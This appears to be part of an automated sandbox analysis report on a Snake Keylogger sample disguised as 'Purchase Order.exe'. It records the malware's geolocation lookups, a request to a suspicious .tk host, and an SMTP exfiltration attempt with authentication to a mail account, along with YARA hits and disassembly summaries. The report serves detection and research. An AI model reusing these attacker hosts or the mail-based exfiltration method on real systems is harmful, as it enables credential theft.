2024-04-05 06:21:19 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49715	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:21 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-05 06:21:22 UTC	714	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56871 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fG08AWSd0AwFIHGsCrfD0XZtTfbZKRAlJuPX9JPeDKvwjbSj0icYTuRuOF%2B2Opy3BXJ5RU7N%2BK8OiMmrxiM%2Ba0u%2ByVtDvgCbO2Q5TX%2Bdw%2B9NsNROQzRsQ%2FFnHPKcLYDHa2xY6m4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f770050ea2748a-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:21:22 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49717	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:23 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-05 06:21:23 UTC	712	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56872 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DoNvuf6ICCGvyn64y9JzUZiEWddjPOaUcSOM%2FhloNpRBaN4xfWXdLpy6%2FoBrDOI6Jz0WR4IbncNNy0OYgzL3km%2BZOlvGf5YcT%2Fz7EQZpRFs61lI%2FuFcxXIas20rLlAKfu7Hv4%2Bqr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f7700d39c0228a-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:21:23 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49721	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:26 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-05 06:21:27 UTC	708	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56876 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AaOFFSC2n4l0Zlb6s6Jf89RXK3m2GtwAJu9pOGmWBMJgT%2FDQBbTYyFoXHYaiE4HcJcnBmC9mACEql7Gd%2Futy%2FqqA7b4nWjPSIqVXEfX82Eafv5B8nhW8bx8dU%2FdhmKcGH6zBBruj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f770245b3509da-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:21:27 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49723	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:28 UTC	64	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org
2024-04-05 06:21:29 UTC	712	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56878 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DD1OBcvjVr%2BiOeEqfv%2B9uPxq0Ku1PNBrygjS%2FSPLkwqLyicElGIzZrs5VhK2Ck3gCa5b9N85cmaQDUwXmfLrMou5DxM47KGoklbkIbyzPZ%2F44tbsOfAj6Oa1UfH%2Bp8wIeuxj6UZ%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f770319d4fda8f-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:21:29 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49725	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:31 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-05 06:21:32 UTC	702	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56881 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRrLFUWgYNoHob9V3DUiD7A1pTpxFu47MzQDLTn2vddngYO9IKN3bcWod2ZnUBtjawXl0EEZGB40KM1sGTpJeDwtWQvollPcG%2B1oZysbjsiCW5wlvTUPddTXKee3PHYMMwHTBqAD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f770442d9d67bc-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:21:32 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49727	172.67.177.134	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:35 UTC	88	OUT	GET /xml/102.129.152.231 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-04-05 06:21:35 UTC	712	IN	HTTP/1.1 200 OK Date: Fri, 05 Apr 2024 06:21:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 56884 Last-Modified: Thu, 04 Apr 2024 14:33:31 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ffjus%2B6ixXDLflM6Ipv%2FwKRIS56kTtKRsqBBHab0dzN2snMvO5SDuQ5Qcp2%2F2UIZ6dIwZfrhcpEnvttmmjQQKPKLfAMbsVqLTB%2BDL9RVQq0YZWyzLx3%2BlhkQWh3Zs6Um%2Bf8tBhBK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f77059fa29a54b-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:21:35 UTC	380	IN	Data Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73 Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
2024-04-05 06:21:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49728	104.21.27.85	443	7692	C:\Users\user\Desktop\Purchase Order.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-05 06:21:36 UTC	79	OUT	GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
2024-04-05 06:22:07 UTC	737	IN	HTTP/1.1 522 Date: Fri, 05 Apr 2024 06:22:07 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wW3xz5yVIjGOzeBEggeQmLc4TIzLYsq9%2B0yIDnOlhzRXAQVmiDSOfG%2Br4QFldLVnqquXFaY4Vxjzo3YT9nleNI7Fj%2FGBGUrXgrhB%2BNjBxaMOdrfNKERlS2RRbok8t0aHiCgj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 86f770601bc067e6-MIA alt-svc: h3=":443"; ma=86400
2024-04-05 06:22:07 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 5, 2024 08:22:13.452451944 CEST	587	49730	208.91.199.225	192.168.2.9	220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 5, 2024 08:22:13.579083920 CEST	49730	587	192.168.2.9	208.91.199.225	EHLO 436432
Apr 5, 2024 08:22:13.777354002 CEST	587	49730	208.91.199.225	192.168.2.9	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Apr 5, 2024 08:22:13.778438091 CEST	49730	587	192.168.2.9	208.91.199.225	AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
Apr 5, 2024 08:22:13.978909016 CEST	587	49730	208.91.199.225	192.168.2.9	334 UGFzc3dvcmQ6
Apr 5, 2024 08:22:14.181341887 CEST	587	49730	208.91.199.225	192.168.2.9	235 2.7.0 Authentication successful
Apr 5, 2024 08:22:14.181725025 CEST	49730	587	192.168.2.9	208.91.199.225	MAIL FROM:<tslogs@mksiimst.com>
Apr 5, 2024 08:22:14.382597923 CEST	587	49730	208.91.199.225	192.168.2.9	250 2.1.0 Ok
Apr 5, 2024 08:22:14.382769108 CEST	49730	587	192.168.2.9	208.91.199.225	RCPT TO:<tslogs@mksiimst.com>
Apr 5, 2024 08:22:14.612895966 CEST	587	49730	208.91.199.225	192.168.2.9	550 5.4.6 <tslogs@mksiimst.com>: Recipient address rejected: Email Sending Quota Exceeded

Target ID:	3
Start time:	08:21:06
Start date:	05/04/2024
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order.exe"
Imagebase:	0x190000
File size:	502'784 bytes
MD5 hash:	10E2A14BBD30F30C2CB7260741A3D70F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.1413538871.00000000036BE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:21:13
Start date:	05/04/2024
Path:	C:\Users\user\Desktop\Purchase Order.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Purchase Order.exe"
Imagebase:	0xb70000
File size:	502'784 bytes
MD5 hash:	10E2A14BBD30F30C2CB7260741A3D70F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.3800315530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3808084232.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3808084232.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3808084232.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	207
Total number of Limit Nodes:	10

Executed Functions

Function 0690947C Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069096BE

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 701cfd8a89d32c8950c933339412757e98642bcb657902641e3bcc47e540e0a6
Instruction ID: 57b31516fb8e871e6b6c780bd0629f6c4944cd7b9460748cd27fa0577464d64b
Opcode Fuzzy Hash: 701cfd8a89d32c8950c933339412757e98642bcb657902641e3bcc47e540e0a6
Instruction Fuzzy Hash: 03916771D00319CFEB60CFA9C8407EEBBB6BF49310F1485A9E808A7691DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06909488 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069096BE

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b088df2385d80557a506522d789810eada57c8d3b48d6fb4d45ddaf6bee548bb
Instruction ID: b8ad8499c514e7a806a7ffe3c3b7354a10112d7394bb4297070f5916d66be0e0
Opcode Fuzzy Hash: b088df2385d80557a506522d789810eada57c8d3b48d6fb4d45ddaf6bee548bb
Instruction Fuzzy Hash: 51915771D00319CFEB60CFA9C8407EEBBB6BF49310F1485A9E808A7681DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0239B237 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0239B49E

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c15f11518d05092e9305439416457e4b654cb67a535731008e33d51d85b0eff7
Instruction ID: ce9fd2246f034022fdb26d03bb18b2e6743a1d1052f5d6a5da14e1b292154aae
Opcode Fuzzy Hash: c15f11518d05092e9305439416457e4b654cb67a535731008e33d51d85b0eff7
Instruction Fuzzy Hash: 3E811570A00B058FDB24DF69E58475ABBF6FF49308F008A2DD48AD7A50D775E845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 023944B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 023959C9

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f36734c7588daec21e8fd9b88d4ad1d6ca2dbd3cf996a350c42a2dc8f880a1d2
Instruction ID: 7a25a6a9eea3d69fb08ae094c6b953765274e60b3f707a34c188e72f2a628a45
Opcode Fuzzy Hash: f36734c7588daec21e8fd9b88d4ad1d6ca2dbd3cf996a350c42a2dc8f880a1d2
Instruction Fuzzy Hash: 8741E070C0172DCFEB25DFA9C884B8EBBB5BF49704F60806AD408AB251DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0239590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 023959C9

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f98e62fcdc85997326cf491d9ecbe44053d432cbe53905aa03c9cbbade613fa9
Instruction ID: 94f37cf9a4b0df9536e580ca3b1f1aef5b98f30ff0d318a59a7ecbb7af04616c
